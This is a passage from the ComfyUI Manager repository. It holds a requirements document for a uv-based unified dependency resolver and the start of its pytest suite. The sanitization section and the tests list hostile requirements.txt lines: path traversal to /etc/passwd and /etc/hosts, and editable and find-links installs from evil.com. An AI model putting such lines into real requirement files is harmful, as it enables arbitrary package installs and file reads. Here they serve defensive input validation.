pip_fixer.fix_broken()
|
||||
```
|
||||
|
||||
The unified resolver does not call PIPFixer directly.
|
||||
The caller (execute_install_script) calls PIPFixer as part of the existing flow.
|
||||
|
||||
### is_blacklisted() Logic (Must Be Reproduced in Unified Resolver)
|
||||
|
||||
```python
|
||||
# manager_core.py — def is_blacklisted(name)
|
||||
# 1. Simple pip_blacklist membership check
|
||||
# 2. pip_downgrade_blacklist version comparison:
|
||||
# - Parse spec with regex r'([^<>!~=]+)([<>!~=]=?)([^ ]*)'
|
||||
# - match is None (no version spec) + installed → block
|
||||
# - Operator in ['<=', '==', '<', '~='] + installed version >= requested version → block
|
||||
# - Version comparison uses manager_util.StrictVersion (NOT packaging.version)
|
||||
```
|
||||
|
||||
The unified resolver's `_is_downgrade_blacklisted()` method faithfully reproduces this logic.
|
||||
It uses `manager_util.StrictVersion` instead of `packaging.version.parse()` to ensure consistency with existing behavior.
|
||||
|
||||
### Existing Code --index-url Handling (Asymmetric)
|
||||
|
||||
```python
|
||||
# Only exists in standalone function execute_install_script():
|
||||
if '--index-url' in package_name:
|
||||
s = package_name.split('--index-url')
|
||||
install_cmd = manager_util.make_pip_cmd(["install", s[0].strip(), '--index-url', s[1].strip()])
|
||||
|
||||
# UnifiedManager.execute_install_script() method does NOT have this handling
|
||||
```
|
||||
|
||||
The unified resolver unifies both paths for consistent handling via `_split_index_url()`.
|
||||
355
docs/dev/PRD-unified-dependency-resolver.md
Normal file
355
docs/dev/PRD-unified-dependency-resolver.md
Normal file
@ -0,0 +1,355 @@
|
||||
# PRD: Unified Dependency Resolver
|
||||
|
||||
## 1. Overview
|
||||
|
||||
### 1.1 Background
|
||||
ComfyUI Manager currently installs each node pack's `requirements.txt` individually via `pip install`.
|
||||
This approach causes dependency conflicts where installing a new node pack can break previously installed node packs' dependencies.
|
||||
|
||||
**Current flow:**
|
||||
```mermaid
|
||||
graph LR
|
||||
A1[Install node pack A] --> A2[pip install A's deps] --> A3[Run install.py]
|
||||
B1[Install node pack B] --> B2[pip install B's deps] --> B3[Run install.py]
|
||||
B2 -.->|May break<br/>A's deps| A2
|
||||
```
|
||||
|
||||
### 1.2 Goal
|
||||
Implement a unified dependency installation module that uses `uv` to resolve all dependencies (installed node packs + new node packs) at once.
|
||||
|
||||
**New flow (unified resolver mode):**
|
||||
```mermaid
|
||||
graph TD
|
||||
subgraph "Install Time (immediate)"
|
||||
A1[User installs node pack X] --> A2[Git clone / download]
|
||||
A2 --> A3["Run X's install.py (if exists)"]
|
||||
A3 --> A4["Skip per-node pip install<br/>(deps deferred to restart)"]
|
||||
end
|
||||
|
||||
subgraph "ComfyUI Restart (startup batch)"
|
||||
B1[prestartup_script.py] --> B2[Collect ALL installed node packs' deps]
|
||||
B2 --> B3["uv pip compile → pinned requirements.txt"]
|
||||
B3 --> B4["uv pip install -r → Batch install"]
|
||||
B4 --> B5[PIPFixer environment correction]
|
||||
end
|
||||
```
|
||||
|
||||
> **Terminology**: In this document, "lockfile" refers to the **pinned requirements.txt** generated by `uv pip compile`.
|
||||
> This is different from the `uv.lock` (TOML format) generated by `uv lock`. We use a pip-compatible workflow.
|
||||
|
||||
### 1.3 Scope
|
||||
- Develop a new dedicated dependency resolution module
|
||||
- Opt-in activation from the existing install process
|
||||
- **Handles dependency resolution (deps install) only**. `install.py` execution is handled by existing logic
|
||||
|
||||
---
|
||||
|
||||
## 2. Constraints
|
||||
|
||||
| Item | Description |
|
||||
|------|-------------|
|
||||
| **uv required** | Only operates in environments where `uv` is available |
|
||||
| **Independent of `use_uv` flag** | `use_unified_resolver` is separate from the existing `use_uv` flag. Even if `use_uv=False`, setting `use_unified_resolver=True` attempts resolver activation. Auto-fallback if uv is not installed |
|
||||
| **Pre-validated list** | Input node pack list is assumed to be pre-verified for mutual dependency compatibility |
|
||||
| **Backward compatibility** | Existing pip-based install process is fully preserved (fallback) |
|
||||
| **Blacklist/overrides bypassed** | In unified mode, `pip_blacklist`, `pip_overrides`, `pip_downgrade_blacklist` are NOT applied (empty values passed). Constructor interface is preserved for future extensibility. `uv pip compile` handles all conflict resolution natively. **[DEFERRED]** Reading actual values from `cm_global` at startup is deferred to a future version — v1 always passes empty values |
|
||||
| **Multiple custom_nodes paths** | Supports all paths returned by `folder_paths.get_folder_paths('custom_nodes')` |
|
||||
| **Scope of application** | Batch resolver runs at **module scope** in `prestartup_script.py` (unconditionally when enabled, independent of `install-scripts.txt` existence). The 2 `execute_install_script()` locations skip per-node pip install when unified mode is active (deps deferred to restart). `execute_lazy_install_script()` is also modified to skip per-node pip install in unified mode. Other install paths such as `install_manager_requirements()`, `pip_install()` are outside v1 scope (future extension) |
|
||||
| **Legacy module** | `comfyui_manager/legacy/manager_core.py` is excluded from modification. Legacy paths retain existing pip behavior |
|
||||
|
||||
---
|
||||
|
||||
## 3. Functional Requirements
|
||||
|
||||
### FR-1: Node Pack List and Base Dependency Input
|
||||
|
||||
**Input:**
|
||||
- Node pack list (fullpath list of installed + to-be-installed node packs)
|
||||
- Base dependencies (ComfyUI's `requirements.txt` and `manager_requirements.txt`)
|
||||
|
||||
**Behavior:**
|
||||
- Validate each node pack path
|
||||
- Exclude disabled (`.disabled`) node packs
|
||||
- Detection criteria: Existence of `custom_nodes/.disabled/{node_pack_name}` **directory**
|
||||
- Existing mechanism: Disabling a node pack **moves** it from `custom_nodes/` to `custom_nodes/.disabled/` (does NOT create a `.disabled` file inside the node pack)
|
||||
- At resolver input time, disabled node packs should already be absent from `custom_nodes/`, so normally they won't be in `node_pack_paths`
|
||||
- Defensively exclude any node pack paths that are within the `.disabled` directory
|
||||
- Base dependencies are treated as constraints
|
||||
- Traverse all paths from `folder_paths.get_folder_paths('custom_nodes')`
|
||||
|
||||
**`cm_global` runtime dependencies:**
|
||||
- `cm_global.pip_overrides`, `pip_blacklist`, `pip_downgrade_blacklist` are dynamically assigned during `prestartup_script.py` execution
|
||||
- In unified mode, these are **not applied** — empty values are passed to the resolver constructor
|
||||
- The constructor interface accepts these parameters for future extensibility (defaults to empty when `None`)
|
||||
|
||||
### FR-2: Dependency List Extraction
|
||||
|
||||
**Behavior:**
|
||||
- Parse `requirements.txt` from each node pack directory
|
||||
- Encoding: Use `robust_readlines()` pattern (`chardet` detection, assumes UTF-8 if not installed)
|
||||
- Package name remapping (constructor accepts `overrides` dict — **empty in v1**, interface preserved for extensibility)
|
||||
- Blacklist package filtering (constructor accepts `blacklist` set — **empty in v1**, uv handles torch etc. natively)
|
||||
- Downgrade blacklist filtering (constructor accepts `downgrade_blacklist` list — **empty in v1**)
|
||||
- **Note**: In unified mode, `uv pip compile` resolves all version conflicts natively. The blacklist/overrides/downgrade_blacklist mechanisms from the existing pip flow are bypassed
|
||||
- Strip comments (`#`) and blank lines
|
||||
- **Input sanitization** (see below)
|
||||
- Separate handling of `--index-url` entries (see below)
|
||||
|
||||
**Input sanitization:**
|
||||
- Requirements lines matching the following patterns are **rejected and logged** (security defense):
|
||||
- `-r`, `--requirement` (recursive include → path traversal risk)
|
||||
- `-e`, `--editable` (VCS/local path install → arbitrary code execution risk)
|
||||
- `-c`, `--constraint` (external constraint file injection)
|
||||
- `--find-links`, `-f` (external package source specification)
|
||||
- `@ file://` (local file reference → path traversal risk)
|
||||
- Package names containing path separators (`/`, `\`)
|
||||
- Allowed items: Package specs (`name>=version`), specs with `--index-url`, environment markers (containing `;`)
|
||||
- Rejected lines are recorded in the `skipped` list with reason
|
||||
|
||||
**`--index-url` handling:**
|
||||
- Existing code (standalone function `execute_install_script()`) parses `package_name --index-url URL` format for special handling
|
||||
- **Note**: The class method `UnifiedManager.execute_install_script()` does NOT have this handling (asymmetric)
|
||||
- The unified resolver **unifies both paths** for consistent handling:
|
||||
- Package spec → added to the general dependency list
|
||||
- `--extra-index-url URL` → passed as `uv pip compile` argument
|
||||
- Separated index URLs are collected in `CollectedDeps.extra_index_urls`
|
||||
- **Credential redaction**: Authentication info (`user:pass@`) in index URLs is masked during logging
|
||||
|
||||
**Duplicate handling strategy:**
|
||||
- No deduplication is performed directly
|
||||
- Different version specs of the same package are **all passed as-is** to uv
|
||||
- `uv pip compile` handles version resolution (uv determines the optimal version)
|
||||
|
||||
**Output:**
|
||||
- Unified dependency list (tracked by source node pack)
|
||||
- Additional index URL list
|
||||
|
||||
### FR-3: uv pip compile Execution
|
||||
|
||||
**Behavior:**
|
||||
- Generate temporary requirements file from the collected dependency list
|
||||
- Execute `uv pip compile` to produce a pinned requirements.txt
|
||||
- `--output-file` (required): Specify output file (outputs to stdout only if not specified)
|
||||
- `--constraint`: Pass base dependencies as constraints
|
||||
- `--python`: Current Python interpreter path
|
||||
- `--extra-index-url`: Additional index URLs collected from FR-2 (multiple allowed)
|
||||
- Resolve for the current platform (platform-specific results)
|
||||
|
||||
**Error handling:**
|
||||
- Return conflict package report when resolution fails
|
||||
- Timeout handling (300s): Explicitly catch `subprocess.TimeoutExpired`, terminate child process, then fallback
|
||||
- Lockfile output file existence verification: Confirm file was actually created even when `returncode == 0`
|
||||
- Temp file cleanup: Guaranteed in `finally` block. Includes stale temp file cleanup logic at next execution for abnormal termination (SIGKILL) scenarios
|
||||
|
||||
**Output:**
|
||||
- pinned requirements.txt (file with all packages pinned to exact versions)
|
||||
|
||||
### FR-4: Pinned Requirements-based Dependency Installation
|
||||
|
||||
**Behavior:**
|
||||
- Execute `uv pip install -r <pinned-requirements.txt>`
|
||||
- **Do NOT use `uv pip sync`**: sync deletes packages not in the lockfile, risking removal of torch, ComfyUI's own dependencies, etc.
|
||||
- Already-installed packages at the same version are skipped (default uv behavior)
|
||||
- Log installation results
|
||||
|
||||
**Error handling:**
|
||||
- `uv pip install -r` is an **atomic operation** (all-or-nothing)
|
||||
- On total failure: Parse stderr for failure cause report → fallback to existing pip
|
||||
- **No partial failure report** (not possible due to uv's behavior)
|
||||
- `InstallResult`'s `installed`/`skipped` fields are populated by parsing uv stdout; `stderr` records failure cause (no separate `failed` field needed due to atomic model)
|
||||
|
||||
### FR-5: Post-install Environment Correction
|
||||
|
||||
**Behavior:**
|
||||
- Call `PIPFixer.fix_broken()` for environment integrity correction
|
||||
- Restore torch version (when change detected)
|
||||
- Fix OpenCV conflicts
|
||||
- Restore comfyui-frontend-package
|
||||
- Restore packages based on `pip_auto_fix.list`
|
||||
- **This step is already performed in the existing `execute_install_script()` flow, so the unified resolver itself doesn't need to call it**
|
||||
- However, an optional call option is provided for cases where the resolver is invoked independently outside the existing flow
|
||||
|
||||
### FR-6: install.py Execution (Existing Flow Maintained)
|
||||
|
||||
**Behavior:**
|
||||
- The unified resolver handles deps installation **at startup time only**
|
||||
- `install.py` execution is handled by the existing `execute_install_script()` flow and runs **immediately** at install time
|
||||
- Deps are deferred to startup batch resolution; `install.py` runs without waiting for deps
|
||||
|
||||
**Control flow specification (unified mode active):**
|
||||
- `execute_install_script()`: **skip** the `requirements.txt`-based individual pip install loop entirely (deps will be resolved at next restart)
|
||||
- `install.py` execution runs **immediately** as before
|
||||
- At next ComfyUI restart: `prestartup_script.py` runs the unified resolver for all installed node packs
|
||||
|
||||
**Control flow specification (unified mode inactive / fallback):**
|
||||
- Existing pip install loop runs as-is (no change)
|
||||
- `install.py` execution runs **immediately** as before
|
||||
|
||||
### FR-7: Startup Batch Resolution
|
||||
|
||||
**Behavior:**
|
||||
- When `use_unified_resolver=True`, **all dependency resolution is deferred to ComfyUI startup**
|
||||
- At install time: node pack itself is installed (git clone, etc.) and `install.py` runs immediately, but `requirements.txt` deps are **not** installed per-request
|
||||
- At startup time: `prestartup_script.py` runs the unified resolver once for all installed node packs
|
||||
|
||||
**Startup execution flow (in `prestartup_script.py`):**
|
||||
1. At **module scope** (before `execute_startup_script()` gate): check `manager_util.use_unified_resolver` flag
|
||||
2. If enabled: collect all installed node pack paths, read base requirements from `comfy_path`
|
||||
3. Create `UnifiedDepResolver` with empty blacklist/overrides/downgrade_blacklist (uv handles resolution natively)
|
||||
4. Call `resolve_and_install()` — collects all deps → compile → install in one batch
|
||||
5. On success: set `_unified_resolver_succeeded = True`, skip per-node pip in `execute_lazy_install_script()`
|
||||
6. On failure: log warning, `execute_lazy_install_script()` falls back to existing per-node pip install
|
||||
7. **Note**: Runs unconditionally when enabled, independent of `install-scripts.txt` existence
|
||||
|
||||
**`execute_install_script()` behavior in unified mode:**
|
||||
- Skip the `requirements.txt` pip install loop entirely (deps will be handled at restart)
|
||||
- `install.py` execution still runs immediately
|
||||
|
||||
**`execute_lazy_install_script()` behavior in unified mode:**
|
||||
- Skip the `requirements.txt` pip install loop (already handled by startup batch resolver)
|
||||
- `install.py` execution still runs
|
||||
|
||||
**Windows-specific behavior:**
|
||||
- Windows lazy install path also benefits from startup batch resolution
|
||||
- `try_install_script()` defers to `reserve_script()` as before for non-`instant_execution=True` installs
|
||||
|
||||
---
|
||||
|
||||
## 4. Non-functional Requirements
|
||||
|
||||
| Item | Requirement |
|
||||
|------|-------------|
|
||||
| **Performance** | Equal to or faster than existing individual installs |
|
||||
| **Stability** | Must not break the existing environment |
|
||||
| **Logging** | Log progress and results at each step (details below) |
|
||||
| **Error recovery** | Fallback to existing pip method on failure |
|
||||
| **Testing** | Unit test coverage above 80% |
|
||||
| **Security** | requirements.txt input sanitization (see FR-2), credential log redaction, subprocess list-form invocation |
|
||||
| **Concurrency** | Prevent lockfile path collisions on concurrent install requests. Use process/thread-unique suffixes or temp directories |
|
||||
| **Temp files** | Guarantee temp file cleanup on both normal and abnormal termination. Clean stale files on next execution |
|
||||
|
||||
### Logging Requirements
|
||||
|
||||
| Step | Log Level | Content |
|
||||
|------|-----------|---------|
|
||||
| Resolver start | `INFO` | Node pack count, total dependency count, mode (unified/pip) |
|
||||
| Dependency collection | `INFO` | Collection summary (collected N, skipped N, sources N) |
|
||||
| Dependency collection | `DEBUG` | Per-package collection/skip/remap details |
|
||||
| `--index-url` detection | `INFO` | Detected additional index URL list |
|
||||
| uv compile start | `INFO` | Execution command (excluding sensitive info) |
|
||||
| uv compile success | `INFO` | Pinned package count, elapsed time |
|
||||
| uv compile failure | `WARNING` | Conflict details, fallback transition notice |
|
||||
| Install start | `INFO` | Number of packages to install |
|
||||
| Install success | `INFO` | Installed/skipped/failed count summary, elapsed time |
|
||||
| Install failure | `WARNING` | Failed package list, fallback transition notice |
|
||||
| Fallback transition | `WARNING` | Transition reason, original error message |
|
||||
| Overall completion | `INFO` | Final result summary (success/fallback/failure) |
|
||||
|
||||
> **Log prefix**: All logs use `[UnifiedDepResolver]` prefix to distinguish from existing pip install logs
|
||||
|
||||
---
|
||||
|
||||
## 5. Usage Scenarios
|
||||
|
||||
### Scenario 1: Single Node Pack Installation (unified mode)
|
||||
```
|
||||
User requests installation of node pack X
|
||||
→ Git clone / download node pack X
|
||||
→ Run X's install.py (if exists) — immediately
|
||||
→ Skip per-node pip install (deps deferred)
|
||||
→ User restarts ComfyUI
|
||||
→ prestartup_script.py: Collect deps from ALL installed node packs (A,B,C,X)
|
||||
→ uv pip compile resolves fully compatible versions
|
||||
→ uv pip install -r for batch installation
|
||||
→ PIPFixer environment correction
|
||||
```
|
||||
|
||||
### Scenario 2: Multi Node Pack Batch Installation (unified mode)
|
||||
```
|
||||
User requests installation of node packs X, Y, Z
|
||||
→ Each node pack: git clone + install.py — immediately
|
||||
→ Per-node pip install skipped for all
|
||||
→ User restarts ComfyUI
|
||||
→ prestartup_script.py: Collect deps from ALL installed node packs (including X,Y,Z)
|
||||
→ Single uv pip compile → single uv pip install -r
|
||||
→ PIPFixer environment correction
|
||||
```
|
||||
|
||||
### Scenario 3: Dependency Resolution Failure (Edge Case)
|
||||
```
|
||||
Even pre-validated lists may fail due to uv version differences or platform issues
|
||||
→ uv pip compile failure → return conflict report
|
||||
→ Display conflict details to user
|
||||
→ Auto-execute existing pip fallback
|
||||
```
|
||||
|
||||
### Scenario 4: uv Not Installed
|
||||
```
|
||||
uv unavailable detected → auto-fallback to existing pip method
|
||||
→ Display uv installation recommendation to user
|
||||
```
|
||||
|
||||
### Scenario 5: Windows Lazy Installation (unified mode)
|
||||
```
|
||||
Node pack installation requested on Windows
|
||||
→ Node pack install deferred to startup (existing lazy mechanism)
|
||||
→ On next ComfyUI startup: unified resolver runs first (batch deps)
|
||||
→ execute_lazy_install_script() skips per-node pip (already resolved)
|
||||
→ install.py still runs per node pack
|
||||
```
|
||||
|
||||
### Scenario 6: Malicious/Non-standard requirements.txt
|
||||
```
|
||||
Node pack's requirements.txt contains `-r ../../../etc/hosts` or `-e git+https://...`
|
||||
→ Sanitization filter rejects the line
|
||||
→ Log rejection reason and continue processing remaining valid packages
|
||||
→ Notify user of rejected item count
|
||||
```
|
||||
|
||||
### Scenario 7: Concurrent Install Requests (unified mode)
|
||||
```
|
||||
User requests installation of node packs A and B nearly simultaneously from UI
|
||||
→ Each request: git clone + install.py immediately, deps skipped
|
||||
→ On restart: single unified resolver run handles both A and B deps together
|
||||
→ No concurrency issue (single batch at startup)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. Success Metrics
|
||||
|
||||
| Metric | Target |
|
||||
|--------|--------|
|
||||
| Dependency conflict reduction | 90%+ reduction compared to current |
|
||||
| Install success rate | 99%+ (for compatibility-verified lists) |
|
||||
| Performance | Equal to or better than existing individual installs |
|
||||
| Adoption rate | 50%+ of eligible users |
|
||||
|
||||
---
|
||||
|
||||
## 7. Future Extensions
|
||||
|
||||
- **`cm_global` integration** [DEFERRED]: Read `pip_blacklist`, `pip_overrides`, `pip_downgrade_blacklist` from `cm_global` runtime values instead of passing empty. Constructor interface already accepts these parameters
|
||||
- Lockfile caching: Reuse for identical node pack configurations
|
||||
- Pre-install dependency conflict validation API: Check compatibility before installation
|
||||
- Dependency tree visualization: Display dependency relationships to users
|
||||
- `uv lock`-based cross-platform lockfile support (TOML format)
|
||||
- `install_manager_requirements()` integration: Resolve manager's own dependencies through unified resolver
|
||||
- `pip_install()` integration: Route UI direct installs through unified resolver
|
||||
- Legacy module (`comfyui_manager/legacy/`) unified resolver support
|
||||
|
||||
---
|
||||
|
||||
## Appendix A: Existing Code Install Path Mapping
|
||||
|
||||
> This section is reference material to clarify the unified resolver's scope of application.
|
||||
|
||||
| Install Path | Location | v1 Applied | Notes |
|
||||
|-------------|----------|------------|-------|
|
||||
| `UnifiedManager.execute_install_script()` | `glob/manager_core.py` (method) | ✅ Yes | Skips per-node pip in unified mode (deps deferred to restart) |
|
||||
| Standalone `execute_install_script()` | `glob/manager_core.py` (function) | ✅ Yes | Skips per-node pip in unified mode (deps deferred to restart) |
|
||||
| `execute_lazy_install_script()` | `prestartup_script.py` | ✅ Yes | Skips per-node pip in unified mode (already batch-resolved) |
|
||||
| Startup batch resolver | `prestartup_script.py` | ✅ Yes | **New**: Runs unified resolver once at startup for all node packs |
|
||||
| `install_manager_requirements()` | `glob/manager_core.py` | ❌ No | Manager's own deps |
|
||||
| `pip_install()` | `glob/manager_core.py` | ❌ No | UI direct install |
|
||||
| Legacy `execute_install_script()` (2 locations) | `legacy/manager_core.py` | ❌ No | Legacy paths |
|
||||
999
tests/test_unified_dep_resolver.py
Normal file
999
tests/test_unified_dep_resolver.py
Normal file
@ -0,0 +1,999 @@
|
||||
"""Tests for comfyui_manager.common.unified_dep_resolver."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import importlib
|
||||
import importlib.util
|
||||
import os
|
||||
import shutil
|
||||
import subprocess
|
||||
import sys
|
||||
import tempfile
|
||||
import time
|
||||
import types
|
||||
from unittest import mock
|
||||
|
||||
import pytest
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Import the module under test by loading it directly, replacing the
|
||||
# ``from . import manager_util`` relative import with a fake module.
|
||||
# This avoids needing the full ComfyUI runtime.
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
_MOCK_INSTALLED_PACKAGES: dict[str, str] = {}
|
||||
|
||||
|
||||
class _FakeStrictVersion:
|
||||
"""Minimal replica of manager_util.StrictVersion for testing."""
|
||||
|
||||
def __init__(self, version_string: str) -> None:
|
||||
parts = version_string.split('.')
|
||||
self.major = int(parts[0])
|
||||
self.minor = int(parts[1]) if len(parts) > 1 else 0
|
||||
self.patch = int(parts[2]) if len(parts) > 2 else 0
|
||||
|
||||
def __ge__(self, other: _FakeStrictVersion) -> bool:
|
||||
return (self.major, self.minor, self.patch) >= (other.major, other.minor, other.patch)
|
||||
|
||||
def __eq__(self, other: object) -> bool:
|
||||
if not isinstance(other, _FakeStrictVersion):
|
||||
return NotImplemented
|
||||
return (self.major, self.minor, self.patch) == (other.major, other.minor, other.patch)
|
||||
|
||||
def __lt__(self, other: _FakeStrictVersion) -> bool:
|
||||
return (self.major, self.minor, self.patch) < (other.major, other.minor, other.patch)
|
||||
|
||||
|
||||
def _fake_get_installed_packages(renew: bool = False) -> dict[str, str]:
|
||||
return _MOCK_INSTALLED_PACKAGES
|
||||
|
||||
|
||||
def _fake_robust_readlines(path: str) -> list[str]:
|
||||
with open(path, "r", encoding="utf-8") as f:
|
||||
return f.readlines()
|
||||
|
||||
|
||||
# Build a fake manager_util module
|
||||
_manager_util_fake = types.ModuleType("comfyui_manager.common.manager_util")
|
||||
_manager_util_fake.StrictVersion = _FakeStrictVersion
|
||||
_manager_util_fake.get_installed_packages = _fake_get_installed_packages
|
||||
_manager_util_fake.robust_readlines = _fake_robust_readlines
|
||||
|
||||
# Ensure parent packages exist in sys.modules
|
||||
if "comfyui_manager" not in sys.modules:
|
||||
sys.modules["comfyui_manager"] = types.ModuleType("comfyui_manager")
|
||||
if "comfyui_manager.common" not in sys.modules:
|
||||
_common_mod = types.ModuleType("comfyui_manager.common")
|
||||
sys.modules["comfyui_manager.common"] = _common_mod
|
||||
sys.modules["comfyui_manager"].common = _common_mod # type: ignore[attr-defined]
|
||||
|
||||
# Inject the fake manager_util
|
||||
sys.modules["comfyui_manager.common.manager_util"] = _manager_util_fake
|
||||
sys.modules["comfyui_manager.common"].manager_util = _manager_util_fake # type: ignore[attr-defined]
|
||||
|
||||
# Now load the module under test via spec
|
||||
_MODULE_PATH = os.path.join(
|
||||
os.path.dirname(__file__), os.pardir,
|
||||
"comfyui_manager", "common", "unified_dep_resolver.py",
|
||||
)
|
||||
_spec = importlib.util.spec_from_file_location(
|
||||
"comfyui_manager.common.unified_dep_resolver",
|
||||
os.path.abspath(_MODULE_PATH),
|
||||
)
|
||||
assert _spec is not None and _spec.loader is not None
|
||||
_udr_module = importlib.util.module_from_spec(_spec)
|
||||
sys.modules[_spec.name] = _udr_module
|
||||
_spec.loader.exec_module(_udr_module)
|
||||
|
||||
# Pull symbols into the test namespace
|
||||
CollectedDeps = _udr_module.CollectedDeps
|
||||
InstallResult = _udr_module.InstallResult
|
||||
LockfileResult = _udr_module.LockfileResult
|
||||
PackageRequirement = _udr_module.PackageRequirement
|
||||
ResolveResult = _udr_module.ResolveResult
|
||||
UnifiedDepResolver = _udr_module.UnifiedDepResolver
|
||||
UvNotAvailableError = _udr_module.UvNotAvailableError
|
||||
collect_base_requirements = _udr_module.collect_base_requirements
|
||||
collect_node_pack_paths = _udr_module.collect_node_pack_paths
|
||||
_CREDENTIAL_PATTERN = _udr_module._CREDENTIAL_PATTERN
|
||||
_DANGEROUS_PATTERNS = _udr_module._DANGEROUS_PATTERNS
|
||||
_TMP_PREFIX = _udr_module._TMP_PREFIX
|
||||
_VERSION_SPEC_PATTERN = _udr_module._VERSION_SPEC_PATTERN
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def _make_node_pack(tmp: str, name: str, requirements: str | None = None) -> str:
|
||||
"""Create a fake node pack directory with optional requirements.txt."""
|
||||
path = os.path.join(tmp, name)
|
||||
os.makedirs(path, exist_ok=True)
|
||||
if requirements is not None:
|
||||
with open(os.path.join(path, "requirements.txt"), "w") as f:
|
||||
f.write(requirements)
|
||||
return path
|
||||
|
||||
|
||||
def _resolver(
|
||||
paths: list[str],
|
||||
blacklist: set[str] | None = None,
|
||||
overrides: dict[str, str] | None = None,
|
||||
downgrade_blacklist: list[str] | None = None,
|
||||
) -> UnifiedDepResolver:
|
||||
return UnifiedDepResolver(
|
||||
node_pack_paths=paths,
|
||||
blacklist=blacklist or set(),
|
||||
overrides=overrides or {},
|
||||
downgrade_blacklist=downgrade_blacklist or [],
|
||||
)
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# Data class instantiation
|
||||
# ===========================================================================
|
||||
|
||||
class TestDataClasses:
|
||||
def test_package_requirement(self):
|
||||
pr = PackageRequirement(name="torch", spec="torch>=2.0", source="/packs/a")
|
||||
assert pr.name == "torch"
|
||||
assert pr.spec == "torch>=2.0"
|
||||
|
||||
def test_collected_deps_defaults(self):
|
||||
cd = CollectedDeps()
|
||||
assert cd.requirements == []
|
||||
assert cd.skipped == []
|
||||
assert cd.sources == {}
|
||||
assert cd.extra_index_urls == []
|
||||
|
||||
def test_lockfile_result(self):
|
||||
lr = LockfileResult(success=True, lockfile_path="/tmp/x.txt")
|
||||
assert lr.success
|
||||
assert lr.conflicts == []
|
||||
|
||||
def test_install_result(self):
|
||||
ir = InstallResult(success=False, stderr="boom")
|
||||
assert not ir.success
|
||||
assert ir.installed == []
|
||||
|
||||
def test_resolve_result(self):
|
||||
rr = ResolveResult(success=True)
|
||||
assert rr.collected is None
|
||||
assert rr.error is None
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# collect_requirements
|
||||
# ===========================================================================
|
||||
|
||||
class TestCollectRequirements:
|
||||
def test_normal_parsing(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\nrequests\n")
|
||||
r = _resolver([p])
|
||||
deps = r.collect_requirements()
|
||||
assert len(deps.requirements) == 2
|
||||
names = {req.name for req in deps.requirements}
|
||||
assert "numpy" in names
|
||||
assert "requests" in names
|
||||
|
||||
def test_empty_requirements(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "")
|
||||
r = _resolver([p])
|
||||
deps = r.collect_requirements()
|
||||
assert deps.requirements == []
|
||||
|
||||
def test_no_requirements_file(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a") # No requirements.txt
|
||||
r = _resolver([p])
|
||||
deps = r.collect_requirements()
|
||||
assert deps.requirements == []
|
||||
|
||||
def test_comment_and_blank_handling(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "# comment\n\nnumpy\n \n")
|
||||
r = _resolver([p])
|
||||
deps = r.collect_requirements()
|
||||
assert len(deps.requirements) == 1
|
||||
|
||||
def test_inline_comment_stripping(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.0 # pin version\n")
|
||||
r = _resolver([p])
|
||||
deps = r.collect_requirements()
|
||||
assert deps.requirements[0].spec == "numpy>=1.0"
|
||||
|
||||
def test_blacklist_filtering(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "torch\nnumpy\ntorchaudio\n")
|
||||
r = _resolver([p], blacklist={"torch", "torchaudio"})
|
||||
deps = r.collect_requirements()
|
||||
assert len(deps.requirements) == 1
|
||||
assert deps.requirements[0].name == "numpy"
|
||||
assert len(deps.skipped) == 2
|
||||
|
||||
def test_remap_application(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "old-package\n")
|
||||
r = _resolver([p], overrides={"old-package": "new-package>=1.0"})
|
||||
deps = r.collect_requirements()
|
||||
assert deps.requirements[0].spec == "new-package>=1.0"
|
||||
|
||||
def test_disabled_path_new_style(self, tmp_path):
|
||||
disabled_dir = os.path.join(str(tmp_path), ".disabled")
|
||||
p = _make_node_pack(disabled_dir, "pack_a", "numpy\n")
|
||||
r = _resolver([p])
|
||||
deps = r.collect_requirements()
|
||||
assert deps.requirements == []
|
||||
|
||||
def test_disabled_path_old_style(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a.disabled", "numpy\n")
|
||||
r = _resolver([p])
|
||||
deps = r.collect_requirements()
|
||||
assert deps.requirements == []
|
||||
|
||||
def test_duplicate_specs_kept(self, tmp_path):
|
||||
p1 = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\n")
|
||||
p2 = _make_node_pack(str(tmp_path), "pack_b", "numpy>=1.22\n")
|
||||
r = _resolver([p1, p2])
|
||||
deps = r.collect_requirements()
|
||||
numpy_reqs = [req for req in deps.requirements if req.name == "numpy"]
|
||||
assert len(numpy_reqs) == 2 # Both specs preserved
|
||||
|
||||
def test_sources_tracking(self, tmp_path):
|
||||
p1 = _make_node_pack(str(tmp_path), "pack_a", "numpy\n")
|
||||
p2 = _make_node_pack(str(tmp_path), "pack_b", "numpy\n")
|
||||
r = _resolver([p1, p2])
|
||||
deps = r.collect_requirements()
|
||||
assert len(deps.sources["numpy"]) == 2
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# Input sanitization
|
||||
# ===========================================================================
|
||||
|
||||
class TestInputSanitization:
|
||||
@pytest.mark.parametrize("line", [
|
||||
"-r ../../../etc/hosts",
|
||||
"--requirement secret.txt",
|
||||
"-e git+https://evil.com/repo",
|
||||
"--editable ./local",
|
||||
"-c constraint.txt",
|
||||
"--constraint external.txt",
|
||||
"--find-links http://evil.com/pkgs",
|
||||
"-f http://evil.com/pkgs",
|
||||
"evil_pkg @ file:///etc/passwd",
|
||||
])
|
||||
def test_dangerous_patterns_rejected(self, line, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", line + "\n")
|
||||
r = _resolver([p])
|
||||
deps = r.collect_requirements()
|
||||
assert deps.requirements == []
|
||||
assert len(deps.skipped) == 1
|
||||
